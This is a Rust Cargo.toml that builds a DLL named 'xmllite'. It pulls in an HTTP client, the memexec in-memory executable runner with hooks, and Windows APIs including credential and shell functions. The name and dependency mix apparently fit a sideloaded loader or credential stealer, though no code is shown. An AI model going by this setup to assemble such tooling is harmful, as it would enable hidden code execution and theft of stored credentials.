[package]
name = "xmllite"
version = "0.1.0"
edition = "2021"

[lib]
crate-type = ["cdylib"]

[dependencies]
reqwest = "0.11.10"
lazy_static = "1.4.0"
random-string = "1.0.0"

[dependencies.data-cargo-22]
path = ".."
version = "0.1.0"

[dependencies.tokio]
version = "1.18.0"
features = [
    "full"
]

[dependencies.memexec]
git = "https://github.com/DmitrijVC/memexec"
version = "0.3.0"
features = [
    "hook"
]

[dependencies.winapi]
version = "0.3.9"
features = [
    "minwindef",
    "winnt",
    "libloaderapi",
    "processthreadsapi",
    "objidlbase",
    "unknwnbase",
    "consoleapi",
    "shellapi",
    "winuser",
    "errhandlingapi",
    "wincred",
]
